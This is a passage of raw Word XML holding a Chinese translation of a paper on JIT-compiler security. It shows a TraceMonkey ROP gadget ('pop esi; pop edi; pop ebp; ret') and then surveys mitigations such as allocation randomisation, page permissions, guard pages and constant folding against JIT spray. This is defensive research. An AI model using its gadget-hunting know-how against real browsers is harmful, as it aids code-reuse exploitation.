        <w:ind w:left="160"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>以下是在TraceMonkey发出的JIT代码中轻松生成gaJIT的示例</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EDC596" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CC1B168" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>gaJIT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>位于偏移量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0x9e18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>个匹配项）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBFB92C" w14:textId="610C3D33" w:rsidR="0026102A" w:rsidRDefault="00024F73">
      <w:pPr>
        <w:spacing w:before="39"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">op </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>si</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">pop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> pop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2FC2D8" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1652CE09" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这使我们可以在单个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>gaJIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实例中控制多个寄存器的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B6E299" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:sz w:val="34"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="601FCB51" w14:textId="388E7AC5" w:rsidR="0026102A" w:rsidRDefault="005C7515">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_bookmark12"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>技术</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC7C40F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="38"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10B957EE" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="283" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>我们简要研究了许多不同的竞争JIT实现中的JIT强化技术的状态。这项研究使我们更好地了解了哪些JIT已针对攻击者进行了强化，以及哪些可能有助于攻击者在实施了DEP和ASLR等保护措施的强化环境中成功利用目标。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316F0F31" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CA69A74" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_bookmark13"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>分配API的随机化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E800AD6" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="39"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="412CA482" w14:textId="4F7D076A" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="514"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通常使用低级API（例如POSIX平台上的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和Win32平台上的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）分配</w:t>
      </w:r>
      <w:r w:rsidR="005C7515">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的本机代码的页面。随机化JIT代码页是战胜JIT浪潮和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>代码重用攻</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>击的关键，就像DLL的随机化是战胜传统ROP漏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>洞的关键一样。在Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>上，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> API返回的内存受ASLR约束，并且默认情况下是随机分配的。但是，默认情况下不会对Win32上的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进行随机调用，它将以0x10000字节的偏移量返回可预测的连续内存分配。幸运的是，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>带有一个可选参数，指示要分配的所需页面位置。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>创建随机化</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="68AFF74D" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41AF2A47" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:line="295" w:lineRule="auto"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>围绕</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进行包装以模拟</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的现有行为应该是一个简单的过程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F5AF72" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27589776" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_bookmark14"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>页面权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB744D7" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="39"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DD89DB5" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="283" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JIT代码页在发出代码时需要RW权限，并需要RX权限才能执行发出的代码。但是，大多数JIT引擎从一开始就创建具有完全RWX权限的页面，并且在代码生成完成后不会放弃特权。对于某些JIT引擎，这可能会破坏JIT（如</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JaegerMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的嵌入式缓存）的设计，并严重影响性能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A270C09" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="370582AC" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="487"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>其他引擎在发射和执行之间有更明确定义的分隔（例如IE9和LLVM），因此可以通过减少任何时间</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>点分配</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的RWX页面数量来减少攻击面。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6972CC4F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7414EC01" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_bookmark15"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>保护页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AEE57C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="39"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DA6C175" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="460"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>堆分配器通常分配具有读写权限的内存。如果其中一个页面有缓冲区溢出，则攻击者可能会将缓冲区溢出到映射到RW堆页面之外的现有RWX JIT分配上。在JIT页面分配的两侧放置没有权限的保护页面将防止此攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51585F33" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4648FC1F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>以下Firefox映射说明了32位Linux上的问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FD0DDF" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="43"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0A1156" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5320"/>
        </w:tabs>
        <w:spacing w:before="13"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">02808000-0280c000 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>-p 0000000000:00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t>0RW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>堆内存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6047C451" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5320"/>
        </w:tabs>
        <w:spacing w:before="34"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">0280c000-0281c000 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>rwxp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0000000000:00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t>0RWX JIT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C433A7B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="33"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A275F77" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="26"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53864FD1" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_bookmark16"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不断折叠</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B0DADE" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="39"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35C95D9A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="461"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JIT Spray攻击使用攻击者提供的4字节常量作为立即操作数来传递指令，然后转移到下一个常量。常量折叠涉及将所有用户提供的输入（例如0x41424344）拆分为较小的值（2字节），然后将它们组合为原始常量。对于攻击者而言，很难将JIT喷雾的必要指令放入两个字节中。如果指令流是可预测的，则持续折叠不能为JIT喷雾提供足够的保护。这是恒定折叠如何工作的示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0918A674" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11B66AE3" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
